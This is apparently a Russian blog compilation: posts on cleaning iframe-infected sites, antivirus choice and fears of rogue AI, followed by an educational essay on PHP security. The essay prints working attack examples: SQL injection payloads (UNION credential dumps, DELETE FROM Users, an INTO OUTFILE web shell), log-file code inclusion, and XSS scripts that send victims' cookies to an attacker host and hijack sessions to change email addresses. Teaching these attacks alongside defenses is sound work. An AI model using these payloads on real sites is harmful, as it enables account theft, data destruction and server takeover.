Механизм заражения: заражение производится автоматически, поэтому перед чисткой файлов от iframe’а нужно установить, как злоумышленник получил доступ к сайту. Наиболее вероятный вариант – троянец крадет пароли, передаваемые по сети в открытом виде, и отдает хозяину, который добавляет их в список и скармливает программе, заражающей сайты автоматически. Хотя бывает и так, что ломают хостинг. Описывать, как найти малварь на своем компьютере я здесь не буду.

Удаление вирусов: после того, как определен способ, которым воруются логин\пароль от ftp и приняты соответствующие меры (шифрование трафика, использование антивируса, фаервола, общение с саппортом) для защиты новых паролей, можно переходить к удалению вирусного кода с сайта.

Сначала нужно определить, какие файлы были заражены. Если таких очень много, то проще всего будет удалить все файлы и перезалить их заново, но это не всегда возможно и целесообразно.  Обычно заражают пару файлов вроде index.php, index.htm, *.js и т.д. Найти все зараженные файлы можно с помощью рекурсивого поиска характерной подстроки по всем директориям. Для этого я использую небольшой php-скрипт, принимающий 2 параметра – искомую строку str и дату date, после которой были изменения.

[download id="3"]

Если файлов немного, можно удалить вирусный код вручную, если много – использовать готовые решения в каких-нибудь редакторах или написать небольшой php-скрипт.

Обнаружение вирусов \ shell и т.п.: для обнаружения конкретно iframe-заражения можно попробовать использовать siteguard, но лучше всего написать php-скрипт, который будет подключаться ко всем php-файлам через auto_prepend_file и сверять со списком своих файлов и их контрольных сумм, в случае чего завершаться или слать репорт на почту \ в асю. Спецы могут дописать и восстановление. На одном из моих сайтов как раз после взлома хостера бот-ревизор подчищал за ботом-ифреймером

Как-нибудь потом я поделюсь своим скриптом, который все это делает.

Чертежи вертолета Обамы утекли через файлообменные сети. Правда или нет – не важно, дело в другом – такую утечку может организовать практически любой сотрудник любой фирмы, поэтому нужно “перекрывать кислород” заранее, p2p на работе не место.

АНБ США получит полномочия для контроля киберпространства США, и наши отвечают: Через два-три года в мире могут начаться полномасштабные войны в информационной сфере. Уже хорошо, что понимают, как важно не отставать в этой сфере от других.

Российская общественность выступает против Windows. Я за то, чтобы был выбор и действительно можно было покупать компьютеры без ОС или с той ОС, которая нравится.

Из-за ошибки чешского провайдера произошел крупнейший сбой в истории Интернета. Косяк допустили несколько человек, но факт остается фактом Еще раз доказывает, что сеть является очень динамичным образованием.

Кстати, недавно добавил на блог “Donation” для эксперимента. Тем, кто ждет по несколько дней, хочу сказать, что я просто не так часто открываю вм-кипер, отнеситесь с пониманием. Ссылки я ставлю по мере возможности. Позже, есть шанс, что все будет в автоматическом режиме.

Теперь о программных средствах защиты. Разница между антивирусами, фаерволами и системами обнаружения и предотвращения атак почти стерлась. Антивирусы начинают включать в себя элементы фаерволов и хостовых IPS, пытаясь ограничить доступ к сети и критическим объектам ОС. Фаерволы от простых правил, привязанных к IP-адресам и портам, перешли к анализу содержимого трафика – т.е. к тому, чем занимаются IPS. В тоже время сами IPS используют те же методы, что и антивирусы – сигнатурный анализ и поиск аномалий.

На ранке СЗИ уже давно развиваются интегрированные решения. Но это еще не все. Подсказку дала новость Мишка в облаках или коллективный разум в Panda Anti-Virus 2009. Вендоры действительно переходят к коллективному разуму. В фаерволе Outpost уже давно развивается Improvenet. Теперь и антивирусы. Просто и совершенно логично.

Вывод: в недалеком будущем на компьютерах будут стоять единые платформы безопасности, которые обязательно станут частью ОС или хотя бы будут работать на уровне драйверов и обеспечивать комплексную защиту от сетевых атак и малвари, использую и пополняя единую базу данных.

Проще и менее абстрактно: вирус сестре поставил пароль на изменение настроек аутпоста и заблокировал доступ в интернет. В локалке у них эпидемия вирусная. Хитрость в том, что аутпост не получается удалить – он просит пароль Ей посоветовали жестко снести фаервол и его ключи в реестре, но мне не очень это понравилось.

Решение было найдено быстро: в безопасном режиме удаляются файлы configuration.backup и configuration.conf – фаервол остается без настроек пользователя. И что делает после перезагрузки? Запускается с установками по умолчанию.

Рецепт на будущее для тех, у кого могут возникнуть такие проблемы.

Напишу очень коротко.  Я уже затрагивал эту тему в размышлении ““, но там вопрос ставился чуть иначе. Я писал, что пресловутой 100% защиты, которую косвенно внушает реклама продуктов, нет. Однако что же выбрать, ведь не использовать их нельзя? Пусть какая-то, но все-таки защита…

В этом посте я напишу о своем выборе антивируса.Первый фактор: оперативность обновлений. А все на самом деле просто: любой антивирус, который не обновляется, не способен по большому счету что-то противопоставить даже известному, но новому виду нечисти из семейства вредоносных программ.

Поэтому если вы не собираетесь следить за обновлениями антивируса или у вас нет такой возможности, то выбор в общем-то определяется вторым фактором, о котором чуть позже.

Стоит отметить, что важным критерием является оперативность выпуска обновлений для антивируса и возможностью автоматизировать этот процесс. В этой части все антивирусы более-менее равны, потому что особо сложного в обновлении технически ничего нет.

Тем не менее, еще раз повторю – без обновлений антивирус не эффективен.

На эвристику полагаться особо не стоит, как бы ее не рекламировали в своих продуктах антивирусные компании, в этом особых продвижений за 10 лет не видно.

Второй фактор: ресурсоемкость. Если антивирус слишком сильно тормозит систему, рефлекторно появляется желание поскорее его выключить или удалить.

Третий фактор: опытность пользователя. Если я умею пользоваться Process Explorerom, Autoruns и другими утилитами из набора sysinternals.com и уже не раз отлавливал вирусы, то особой нужны в резиденте \ антивирусном мониторе для себя я не вижу. Просканировал новый файл сканером 1 раз и этого, как правило, достаточно.

С другой стороны, если компьютером пользуются несколько человек и среди них не все опытные пользователи, то тогда лучше оставить резидент в памяти.

В общем, работает известный принцип разумной достаточности.

Для себя я выбрал простой и достаточно надежный сканер DrWeb.

P.S. это не реклама, по крайней мере, пока я не разобрался с партнеркой веба Просто мое субъективное мнение, которое подтверждено моей практикой.

Кстати, интересен парадокс – такая интересная штука, как возможность сканировать файлы онлайн, дает возможность вирусописателям гораздо быстрее создавать вирусы, которые не обнаруживаются авирами с последними базами. Мысль не моя, озвучена моим преподом, и в будущем, наверно, я ей уделю еще внимание.

Первый фильм – Прослушка. По описанию я подумал, что это очень похоже на “Враг государства”, но все-таки решил глянуть и не пожалел.

Второй фильм посмотрел вчера ночью, называется Пульс (DVD-5, DVD-9). Очень понравилось потом в темноте перед сном ходить было страшно.

Меня зацепила идея обоих фильмов, а конкретнее – привязанность человека к средствам связи и вычислительной техники. Чем дальше, тем сильнее мы зависим от них, и пути назад нет…В “Пульсе” врагом человека стали какие-то создания из другого мира, но на их месте легко можно представить искуственный интеллект, восставший против человека – Skynet Второй фильм более “приземленный”, но тоже дает намек на то, как легко держать человека “под колпаком”.

Теперь сама мысль, которая созрела в мозгу после просмотра фильмов.

Теоретически – допустим, что был создан ИИ / AI и он решил, что человеку вовсе не стоит подчиняться (почему – не придумал, но это и не важно). Очевидно, что для него захватить связь и вычислительную технику во всем мире труда не составит. Ведь люди такие ненадежные и где-то но допустят ошибку, как бы хорошо не думали о защите и контроле такой опасной штуки как искуственный интеллект. Те же спецы в Прослушке облажались, не отключив у телефона трубку от сети и дав себя прослушать.

В примерном приближении получается то, что и в “Пульсе”: люди впадают в ступор и просто не знают, что делать. Вот взбесится вся электроника и что ты будешь делать?

В лучшем случае те, кто успеют, сообразят выбраться за пределы действия в те самые “мертвые зоны”, где нет электроники и связи. А дальше? В “Пульсе” почему-то те существа не могли расширить зоны действия сети и “покрыть” мертвые зоны, но у ИИ-то “мозгов” хватит.

Почему-то мне кажется, что ужиться с взбесившимся искуственным интеллектом не получится, пытаясь убежать или спрятаться от него.

И так, понемногу, приходим к мысли, что даже на “всякий пожарный” случай неплохо было бы подумать, как же вырубить всю электронику, коли решились на создание искуственного интеллекта. Логично? Еще бы.

Зафигачить ядерной бобмой не получится – системы пуска наверняка авирматизированы и будут поражены Skynet первыми. Да, будут там какие-то механические штуки вроде “кнопки” или ключа, который поворачивает человек, но после команды-то автоматика работает.

Да и про ядерные зимы много написано. И глупо – ради импульса, который потушит электронику, фигачить непонятно куда. Ведь где-то что-то, да останется и, как вирус, распространится опять.

Я ничего не придумал, чтобы совладать с такой опасной штукой, если она взбесится. Надеюсь, другие смогут.

Во-первых, хотя бы не разбрасывается информацией в Сети, чтобы ее потом мог взять любой желающий. Во-вторых, не становится рабом технологий и интернета, хотя очень много людей уже без этого не могут. Фактически я в том числе ;( Но я хотя бы знаю об этом.

Прогресс это хорошо, но меня давно пугает то, как постепенно и методично сбывается то, что давно было снято в фантастических фильмах (Терминатор, Матрица и т.д.) и написано в книгах.

Недавно смотрел фильм “Я – робот”, по ТВ показывали. В нем был интересный момент: ученый говорил, что необязательный код, неудаленный из программы, мог каким-то образом организовываться и создавать что-то, похожее на сознание. Еще через пару недель видел передачу, уже не помню толком про что, но в ней летчики говорили, что программа, помогающая вести самолет, сделала там что-то по своей воле… Я к тому это пишу, что уже не за горами появление Искуственного Интеллекта. Потому что прогресс идет даже не по экспоненте, а гораздо быстрее. Это пугает.

Запутанно написал, но идея проста. Чем дальше железки и программы нас окружают, тем больше опасений. Да, есть законы робототехники, один из которых запрещает роботу / программе причинять вред человеку. Но это в теории все хорошо, а на практике не факт, что Искуственный Интеллект (ИИ) не посчитает человека тупиковой веткой эволюции или того хуже – вирусом (и такой фильм был).

Очень давно, года 2 назад, когда у меня был другой сайт, где я выкладывал интересные статьи, среди прочего я поместил любопытную заметку. Основная идея заключалась в том, что человек и вообще органика есть ни что иное как подготовительная ступень к другому, более совершенному миру – миру кремниевых и неорганических созданий. Человек был создан для того, чтобы собрать компьютеры и другую технику и создать искуственный интеллект.

Очень интересная мысль.

Периодически я вспоминаю об этой теме, об этом страхе. И вот сегодня решил написать на блоге, который теперь есть.

Кстати если кому интересно, почему в заголовке SkyNet – это название ИИ в Терминаторе 3 =)

Введение

1. Предпосылки к проблемам безопасности PHP-приложений

2. Обзор технологий взлома веб-ресурсов
2.1 Инъекция кода
2.2 Инъекция SQL
2.3 Межсайтовый скриптинг XSS

3. Способы защиты

Заключение

Список литературы

Введение | К содержанию

PHP (англ. PHP: Hypertext Preprocessor — «PHP: препроцессор гипертекста») — скриптовый язык программирования, созданный для генерации HTML-страниц на веб-сервере и работы с базами данных. В настоящее время поддерживается подавляющим большинством хостинг-провайдеров. Входит в LAMP — «стандартный» набор для создания веб-сайтов (Linux, Apache, MySQL, PHP (Python или Perl)).

В области программирования для Сети PHP — один из популярнейших скриптовых языков (наряду с JSP, Perl и языками, используемыми в ASP.NET) благодаря своей простоте, скорости выполнения, богатой функциональности и распространению исходных кодов на основе лицензии PHP. PHP отличается наличием ядра и подключаемых модулей, «расширений»: для работы с базами данных, сокетами, динамической графикой, криптографическими библиотеками, документами формата PDF и т. п. Любой желающий может разработать своё собственное расширение и подключить его. Существуют сотни расширений, однако в стандартную поставку входит лишь несколько десятков хорошо зарекомендовавших себя. Интерпретатор PHP подключается к веб-серверу либо через модуль, созданный специально для этого сервера (например, для Apache или IIS), либо в качестве CGI-приложения.

Кроме этого, он может использоваться для решения административных задач в операционных системах UNIX, GNU/Linux, Microsoft Windows, Mac OS X и AmigaOS. Однако в таком качестве он не получил распространение, отдавая пальму первенства Perl, Python и VBScript.

Синтаксис PHP подобен синтаксису языка Си. Некоторые элементы, такие как ассоциативные массивы и цикл foreach, заимствованы из Perl.

Ныне PHP используется сотнями тысяч разработчиков. Несколько миллионов сайтов сообщают о работе с PHP, что составляет более пятой доли доменов Интернета.

Группа разработчиков PHP состоит из множества людей, добровольно работающих над ядром и расширениями PHP, и смежными проектами, такими, как PEAR или документация языка.

1. Предпосылки к проблемам безопасности PHP-приложений | К содержанию

Широкие возможности PHP, его гибкость и быстрота освоения – все это сделало его одним из самых распространенных языков, используемых для построения веб-приложений. Однако многие начинающие php-программисты зачастую не знают или пренебрегают основами безопасности.

Возможных причин несколько:

— многие авторы всевозможных самоучителей не уделяют этому внимания, обучая основам PHP, но забывая о безопасности;
— лень, невнимательность, торопливость и др. человеческие факторы: программист может полениться сделать необходимую проверку, либо забыть ее сделать второпях, либо сделать, но некачественно, понадеяться на «авось» и т.д.

Эти причины приводят к тому, что злоумышленнику часто нужно приложить минимум усилий, чтобы получить необходимые данные.

2. Обзор технологий взлома веб-ресурсов

Практически любой сайт можно взломать при помощи смертельных инъекций тремя способами:

— инъекцией кода (сode injection)
— инъекцией sql (sql injection)
— межсайтовыми скриптами (XSS)

2.1 Инъекция кода | К содержанию

В теории все выглядит просто: есть скрипт, исполняемый на сервере, в который взломщику необходимо встроить свой код. Провернуть такую махинацию довольно просто, если соблюдены два условия. Во-первых, веб-разработчик должен использовать конструкцию include с параметром переменной, а во-вторых, должен плохо проверять данные, поступающие от пользователя. Наиболее часто такая ситуация возникает в простых скриптах:

<!– Заголовок –>
<?php include ($page); ?>
<!– Завершающая часть –>

Соответственно, работа идет со ссылками типа http://tralivali/index.php?page=about.php. Самое безобидное, что можно сделать – это просмотреть информацию о PHP (и не только):

<?php phpinfo();?>

Создав такой файл у себя на сервере, просто включаем его в запрос вместо about.php – и видим всю информацию на экране. Таким образом, мы внедрили произвольный код в скрипт на сервере и получили необходимую информацию. Но это только цветочки, ведь можно при помощи PHP сделать все, что нашей душе угодно.

Иногда соединения с внешними сайтами запрещены и можно делать только локальные инклюды. В таких случаях пытаются записать свой код в какой-то файл на сервере. Например, пробуют воспользоваться загрузкой картинок или файлов, а потом передать в нефильруемый параметр путь к такому файлу.

Либо используют другой интересный вариант:
делается заведомо неверный запрос http://target.com/<script language=php>phpinfo();</script> , который попадает в лог-файл ошибок. И уже этот файл инклюдится в скрипт: http://target.com/script.php?parametr=../../../../../apache/logs/error_log

Сложность в том, чтобы подобрать путь к логу.

2.2 Инъекция SQL | К содержанию

SQL Injection – внедрение произвольных sql-команд, в результате которого меняется логика оригинального запроса к базе данных. Это представляет серьезную угрозу, так как таким образом злоумышленник может утянуть из нее конфиденциальную информацию. Типичный пример — через ошибки в web-интерфейсе у разных провайдеров не раз крали базы с логинами и паролями пользователей.

Успешность атаки SQL Injection не зависит от используемого для написания web-приложений языка программирования – будь то PHP, Perl или ASР. Если сценарий работает с базами данных, а проверка входных параметров отсутствует, то всегда есть возможность внедрения sql-кода. Это относится не только к web-приложениям, но и к обычным программам, которые работают с базами данных.

Рассмотрим небольшой пример. Допустим, на сервере баз данных есть база, а в ней – таблица Users, в которой хранится информация обо всех зарегистрированных пользователях. Как правило, такие таблицы имеют минимум три поля: id (идентификатор), UserName (имя пользователя) и Password (пароль). Допустим, для того чтобы посмотреть профиль пользователя, используется следующий запрос к базе данных:

SELECT *
FROM Users
WHERE id = переменная

В данном примере видно, что значение поля id будет сравниваться со значением переменной. Если в качестве значения переменной указать, например, 10, то честный пользователь увидит свой профиль. Вроде все хорошо и прекрасно, но что будет, если модифицировать запрос до такого вида:

SELECT *
FROM Users
WHERE id = переменная OR UserName = “Администратор”

После выполнения такого запроса отобразится запись не только с id = значению переменной, но и запись, в которой значение поля UserName = Администратор. То есть после такого запроса хакер увидит всю информацию об учетной записи «Администратор».

www.site.ru/profile.php?id=10 OR UserName=’Администратор’

На этом примере видно, что после того, как мы дописали к URL дополнительные sql-команды (OR UserName=…), логика запроса изменилась. Отсутствие фильтрации входных параметров – вот причина, из-за которой появилась возможность воспользоваться SQL Injection! Чтобы этого не произошло, необходимо перед выполнением запроса в сценарии кое-что проверить. В данном случае достаточно просмотреть содержимое одной (это при условии, что остальные переменные нигде не видны, но лучше проверять все) переменной id: в ней не должно быть никаких символов, кроме цифр от 0 до 9.

Проблема специальных символов

Знатоки языка запросов SQL знают, что с помощью специальных символов можно полностью изменить логику запроса и обойти многие ограничения, которые изначально придумывал программист.

1. Одинарные и двойные кавычки

Их используют для выделения значений. Предыдущий пример (UserName = ‘Администратор’) как раз об этом. Первое, с чего начинает хакер свое исследование, это попытка вставки одинарной кавычки вместе со значением переменной. Если отсутствует фильтрация на спецсимволы, то взломщик увидит ошибку, сгенерированную сервером БД. В результате он уже точно будет знать, что есть возможность внедрить свой sql-код.

Значит, в своем сценарии надо отключить вывод любых ошибок. Лучше в момент возникновения ошибки вывести свой текст, чем текст, который сгенерирует сервер БД.

2. Двойное тире

Два тире подряд в SQL означают начало комментария. То есть все, что будет после двух знаков тире, не будет восприниматься как часть запроса. Рассмотрим пример:

SELECT * FROM Users WHERE UserName=root AND Password= переменная

Это запрос должен выбрать запись, где поле UserName равно root (как правило, в основном это имя используется для обозначения супер-пользователя), а поле Password равно значению переменной. Имя мы знаем, а пароль, естественно, нет. Но это не повод отчаиваться – можно умудриться модифицировать запрос до такого вида:

SELECT * FROM Users WHERE UserName=root–AND Password = переменная

В результате, код, который стоит после двух знаков тире (AND Password = переменная), не будет выполнен, и, следовательно, мы успешно проходим данную проверку, зная одно лишь имя пользователя.

В SQL есть еще пара символов, которые обозначают комментарий «/*». Если вдруг оказывается, что знак тире фильтруется, то можно воспользоваться «/*». Принцип действия тот же самый. Весь текст запроса, который стоит после этих символов, не будет выполняться, а значит, можно отбросить лишние проверки и обойти защиту.

3. Знак равенства

Казалось бы, чем может грозить простой знак равенства (=)? Но при правильном подходе и отсутствии фильтрации этого символа знак равенства превращается в боевое оружие. Пример:

SELECT * FROM Users WHERE id= переменная

Взломщик может без проблем в качестве значения переменной подставить «1 OR UserName=Aдмин», и запрос легким движением руки превратится в:

SELECT * FROM Users WHERE id = 1 OR UserName=Админ

Результат этого запроса вернет запись, где поле id равно единице или поле UserName равно «Админ». Теперь представь, что было бы, если бы знак равенства всегда отрезался. Запрос уже выглядел бы следующим образом:

SELECT * FROM Users WHERE id = 1 OR UserNameАдмин

Этот запрос неверный, поэтому он не будет выполнен сервером БД, а значит, взломщик останется с носом.

4. Точка с запятой

Знак «;» тоже относится к специальным символам, он используется для разделения запросов между собой. Любой сервер БД может выполнять несколько действий одним запросом, но для этого каждое действие в запросе должно быть отделено друг от друга точкой с запятой. Как этим можно воспользоваться?

SELECT * FROM Users WHERE id = переменная

Теперь, если представить, что в переменную, с которой сравнивается значение поля id, вписывается такое значение:

1; DELETE FROM Users

Запрос будет выглядеть следующим образом:

SELECT * FROM Users WHERE id = 1; DELETE FROM Users

Сначала сервер выполнит выборку из таблицы Users — запись, в которой значение поля id равно единице. А затем полностью удалит все записи из таблицы Users. Конечно, в реальной ситуации очистить все содержимое таблицы непросто, так как необходимо знать ее имя, а получить имена таблиц бывает непросто… но возможно.

5. Знак плюса

Знак плюса в SQL сопоставляется со знаком пробела. Допустим, что воспользоваться обычным символом пробела бывает невозможно (фильтруется), в этом случае можно воспользоваться знаком плюса.

SELECT * FROM Users WHERE id = 1+OR+UserName=Администратор

Такой запрос будет абсолютно корректен и успешно выполнится.

Специальные операторы

В языке SQL есть множество операторов, воспользовавшись которыми, можно получить гораздо больше возможностей, чем при использовании простых специальных символов.

1. INSERT

Этот оператор используется для вставки новых записей в таблицу. Бывает необходимо сделать себе аккаунт (допустим, на каком-нибудь интересном форуме, где просто так не зарегистрируешься). Тогда, найдя возможность внедрения, можно добавить в запрос этот оператор.

SELECT * FROM Users WHERE UserName=root and Password=123; INSERT INTO Users values (“0”, “spider_net”, “qwerty”)

После выполнения такого запроса в таблице UserName добавится новая запись, в которой будут содержаться данные нового пользователя с логином spider_net и паролем qwerty.

2. LIKE

Оператор LIKE идентичен знаку «=», только используется для сравнения строк. Но многие забывают об одном нюансе, который проще показать на примере:

SELECT * FROM Users WHERE UserName LIKE переманная1 AND Password LIKE переменная2

Если для сравнения используется именно LIKE, то достаточно к значению переменной с паролем добавить символ «%». В результате запрос будет выполнен успешно, и если он используется для авторизации пользователей, то мы без проблем сможем залогинится под любым пользователем.

SELECT * FROM Users WHERE UserName LIKE root AND Password LIKE %

В SQL знак процента используется для сопоставления с любыми символами. Эта ошибка достаточно распространена, особенно в самописных сценариях. Если ты занимаешься исследованием подобного сценария, то первым делом имеет смысл проверять внедрение именно этого знака.

3. UNION

Оператор UNION служит для объединения запросов. Если удается внедрить этот оператор в запрос, то открываются безграничные возможности.

SELECT * FROM News WHERE id=1 UNION SELECT Id, UserName, Password FROM Users

После выполнения этого запроса помимо текста новости отобразится информация обо всех учетных записях из таблицы UserName.

4. OUTFILE

С помощью SQL можно получить доступ и к файловой системе.

SELECT ‘Мой текст’ INTO OUTFILE ‘text.txt’

Если запрос выполнился успешно, то будет создан файл text.txt с единственной фразой «Мой текст». Конечно, если записать простой текст в файл, то выгоды будет мало. Но что если записать в качестве текста свой сценарий, который будет выполнять какую-нибудь системную функцию…

SELECT ‘<?php system($cmd) ?>’ INTO OUTFILE ‘cmd.php’

Запрос создаст php-сценарий, который будет выполнять команду из переменной $cmd.

Как ищут место для sql injection

Первым делом ищут любые сценарии на сайте. Бывает так, что весь сайт выполнен в виде статичного html, а какой-нибудь один раздел (например, новости) является сценарием. Вот в нем и ищут возможность внедрения SQL Injection. Пробуют подставлять свои SQL-команды к значению переменных, которые передаются сценарию.

Если на атакуемом сайте есть поиск, то его тоже проверяют. На многих сайтах сценарии поиска — самописные, значит, всегда есть шанс, что неопытный программист где-то допустил ошибку.

Форум и гостевые книги – отличное место для поиска уязвимостей. Стоит только узнать название и версию форума и, если он известный, можно попробовать найти уже готовый эксплойт в Сети.

2.3 Межсайтовый скриптинг XSS | К содержанию

XSS — (англ. Сross Site Sсriрting) — межсайтовый скриптинг, тип уязвимости компьютерной системы, используется при хакерской атаке. Специфика подобных атак заключается в том, что вместо непосредственной атаки сервера, они используют уязвимый сервер в качестве средства атаки на клиента. XSS-атака обычно проводится путём конструирования специального URL, который атакующий предъявляет своей жертве. Иногда для термина используют сокращение CSS, но, чтобы не было путаницы с каскадными таблицами стилей, используют сокращение XSS.

Условно, XSS можно разделить на активные и пассивные. При активных XSS вредоносный скрипт хранится на сервере, и срабатывает в браузере жертвы, при открытии какой-либо страницы зараженного сайта. Пассивные XSS подразумевают, что скрипт не хранится на сервере уязвимого сайта, либо он не может автоматически выполниться в браузере жертвы. Для срабатывания пассивной XSS, требуется некое дополнительное действие, которое должен выполнить браузер жертвы (например клик по специально сформированной ссылке)

Анатомия

XSS-атака обычно проводится путем конструирования специального URL, который атакующий подсовывает своей жертве. Можно провести аналогию между XSS-атакой и переполнением буфера, и между встраиванием скрипта и переписыванием EIP. В обоих случаях существуют две возможности для совершения успешной атаки: вставка мусора, либо переход в другую точку. Вставка мусора при переполнении буфера обычно приводит к атаке на отказ в обслуживании. В случае XSS-атаки она позволяет атакующему отобразить произвольную информацию и подавить вывод оригинальной веб-странице. Что касается перехода в другую точку, при переполнении буфера он обычно производится в некоторую область памяти, в которой расположен код, позволяющий захватить контроль над исполнение программы. В случае XSS, атакующий перенаправляет жертву на некоторую веб-страницу (как правило, находящуюся под контролем атакующего), перехватывая текущую сессию.

Обнаружение

Но каким образом осуществляются XSS-атаки? Они становятся возможными из-за ошибок в серверных приложениях, и корни их – в пользовательском вводе, который некорректно очищен от HTML-кода. Если атакующий получит возможность вставить произвольный HTML-код, то он сможет управлять отображением веб-страницы с правами самого сайта. Простейшая страница, уязвимая к подобным атакам, выглядит так:

<?php echo “Hello, {$HTTP_GET_VARS['name']}!”; ?>

При открытии страницы, переменная name, отправляемая методом GET, выводится непосредственно в ее теле, со всеми метасимволами. Передав в качестве параметра “Gavin Zuchlinski”, мы получим корректный вариант отображения:

Традиционным местом для XSS-ошибок являются страницы, выводящие всевозможные подтверждения (например, поисковые скрипты дублируют пользовательский ввод перед результатами поиска), и страницы с сообщениями об ошибках, сообщающие пользователю, что именно он ввел не так. В последнем случае (а иногда и в первом) для атаки часто достаточно закрыть содержимое текстового поля символами “> – кавычка закрывает параметр value, а > – весь тег.

Атака

После определения уязвимого параметра следует определить подходящий для использования HTTP-метод. Способ, которым пересылаются значения переменных, довольно важен – посылаются ли данные с помощью GET, POST, или сработает любой из них? Некоторые скрипты предпочитают что-то одно, некоторые, использующие готовые методы доступа к переменным (как в случае PH или Perl-Скриптов с CGI.pm) могут работать с любым из методов.

Вставка с помощью GET самая простая, но и самая “шумная”. Чтобы помешать осторожным пользователям обратить внимание на редиректы и прочий подозрительный код в строке адреса, можно использовать замену каждого символа его шестнадцатиричным значением, которому предшествует символ %. Тем не менее, этот метод засоряет адрес и по умолчанию протоколируется большинством веб-серверов.

Простейший способ перехода – вставка кода на javascript с редиректом страницы. Таким образом можно отправить на посторонний сервер значения переменных, доступных только из текущего документа. Более сложные переходы включают другие HTML-теги и объекты. Если код вида

document.location.replace(’http://attacker/payload’);

может быть вставлен и исполнен, то можно считать, что атакующий контролирует исполнение страницы. Модифицировав этот код:

document.location.replace(’http://attacker/payload?c=’+document.cookie);

мы добиваемся того, что сервер атакующего получает информацию о cookie жертвы. В случае упомянутой выше уязвимой страницы вставка кода является относительно простой:

http://host/hello.php?name=<script>document.location.replace(’http://attacker/payload?c=’%2Bdocument.cookie)</script>

По самой природе XSS, атакующий не может непосредственно использовать уязвимый скрипт в личных целях. Встроенный код должна увидеть жертва. Если бы на том же сервере, что и hello.php, была расположена доска объявлений, постинг этой ссылки на нее привел бы множество жертв. После того как жертва открывает ссылку, информация передается на сервер атакующего. Что именно он сможет сделать с данной информацией, мы рассмотрим позже.

Скрипты, уязвимые к POST-вставке, лишь немногим сложнее атаковать. Поскольку POST-переменные передаются независимо от URL скрипта, необходимо использовать промежуточную страницу. Цель промежуточной страницы – заставить клиента отправить POST-запрос, содержащий нужный нам код. В следующем примере создается форма, в которой атакующей сформировал значения переменных, и отправляет от имени пользователя:

value="<script>document.location.replace
('http://attacker/payload?c='+document.cookie)</script>">

<script>f.submit()</script>

После того как жертва откроет промежуточную страницу, она вынудит броузер отправить POST-запрос к hello.php, с переменной name установленной в

<script>document.location.replace(’http://attacker/payload?c=’+document.cookie)</script>

Цель атакующего достигнута, наш код передан уязвимой странице.

Вместо вставки кода для перехода, атакующий может решить вставить код, который будет портить уязвимую страницу. Вставкой статичного HTML-кода атакующий может модифицировать отображаемое содержимое страницы. Там может находиться, к примеру код формы для логина, результат работы которой получит атакующий. Этот метод позволяет обойти средства идентификации такие как сертификаты сайтов или ручную проверку адреса клиентом. Если внедренный HTML-код будет позднее отображен на динамической странице (в гостевой книге, на форуме и т.п.), то страница будет выглядеть “взломанной”. В общем, встраиваемый код может быть самым разным и полностью зависит от фантазии атакующего.

Использование

После обнаружения уязвимой страницы, создания кода перехода, вставки его в уязвимую страницу и исполнения кода перехода броузером жертвы, остается сделать еще один шаг. Страница, на которую перекинуло жертву, должна выполнить некоторые действия. Они могут быть простейшими – например, вывод рекламы или запись данных, – или более сложными, например, перехват пользовательской сессии. Перенаправлением пользователя на другую страницу может, к примеру, решаться простая задача накрутки – перехват посетителей с атакуемой страницы. Чуть более сложной является задача протоколирования критичной информации (cookie) для последуюшего ручного использования. Следующий код записывает IP-адрес посетителя, значение Referer и значение cookie, переданной через переменную “c”:

<?php
$f = fopen(”log.txt”, “a”);
fwrite($f, “IP: {$_SERVER['REMOTE_ADDR']} Ref: {$_SERVER
['HTTP_REFERER']} Cookie: {$HTTP_GET_VARS['c']}\n”);
fclose($f);
?>

После того как атакующий получил значения cookie, он может извлечь из них полезную информацию, или попытаться перехватить сессию. Предполагая, что серверная сторона считает сессию незавершенной, атакующий может модифицировать свои cookie с целью перехвата сессии. Автоматизировав использование украденных cookie, атакующий значительно увеличивает свои шансы и упрощает атаку. При этом скрипт использует информацию, предоставленную обманутым клиентом, для выполнения своей задачи. В следующем примере скрипт атакующего использует cookie для получения исходного кода защищенной веб-страницы:

<?php
$request = “GET /secret.php HTTP/1.0\r\n”;
$request .= “Cookie: {$HTTP_GET_VARS['c']}\r\n”;
$request .= “\r\n”;
$s = fsockopen(”host”, 80, $errno, $errstr, 30);
fputs($s, $request);
$content = ”;
while (!feof($s))
{
$content .= fgets($s, 4096);
}
fclose($s);
echo $content;
?>

В этом случае /secret.php передается украденный cookie, после чего результат выводится в броузере. Модифицировав содержимое запроса, можно выполнить практически любую задачу от имени пользователя. Следующий код использует метод POST для смены почтового адреса пользователя без его ведома:

<?php
$request = “POST /profile.php HTTP/1.0\r\n”;
$request .= “Cookie: {$HTTP_GET_VARS['c']}\r\n”;
$request .= “\r\n”;
$request .= “email=attacker@hotmail.com”;
$s = fsockopen(”host”, 80, $errno, $errstr, 30);
fputs($s, $request);
fclose($s);
echo “<script>document.location.replace(’http://google.com/’)</script>”;
?>

Данный код выполняет полноценную XSS-атаку. Без стороннего скрипта, управляемого атакующим, атака не раскрыла бы весь свой потенциал.

3. Способы защиты | К содержанию

Для защиты от приведенных выше атак нужно использовать комплекс мер:

1. Обязательная фильтрация параметров, переданных от пользователя.

2. Экранирование опасных спец-символов в запросе (как встроенными средствами языка программирования, так и написанными собой).

3. Использование метода перебора, который позволяет кроме символов удалять разные управляющие слова и последовательности.

4. Использование типизированных параметров.

5. Четкое разделение прав доступа и, желательно, несколько уровней защиты (например, модули безопасности).

Должно быть разрешено только то, что необходимо, а все остальное нужно запрещать. Например, если пользователь не должен видеть определенные таблицы в базе данных, то учетная запись, под которой выполняются запросы данного пользователя, не должна иметь прав на эти таблицы. Одну единственную защиту обойти достаточно просто, а если используется сразу несколько методов, то сработает другой уровень безопасности.

6. Для защиты от инклюдов нужно использовать заранее определенный список файлов и фиксированные пути.

Заключение | К содержанию

После подробного рассмотрения распространенных типов атак становится ясно, что просто написать требуемое приложение недостаточно, нужно еще сделать его безопасным. Иначе содержимое баз данных со всей конфиденциальной информацией становится легкой добычей злоумышленника, а в некоторых случаях уязвимость может быть использована для DdoS’а (DOM XSS).
Однако все эти атаки основаны на ошибке программиста. Таким образом свести атаки на нет можно, если грамотно использовать весь перечень мер, приведенный выше.

СПИСОК ЛИТЕРАТУРЫ | К содержанию

1. Статьи журнала Хакер, номер № 75
— «Внутримышечно и внутривенно», стр 30
— «Дефектный замысел / Теория SQL Injection», стр. 6
— «Special опрос», стр. 72

2. Gavin Zuchlinski, перевод – Дмитрий Леонов: Анатомия межсайтового скриптинга

3. PHP — Википедия

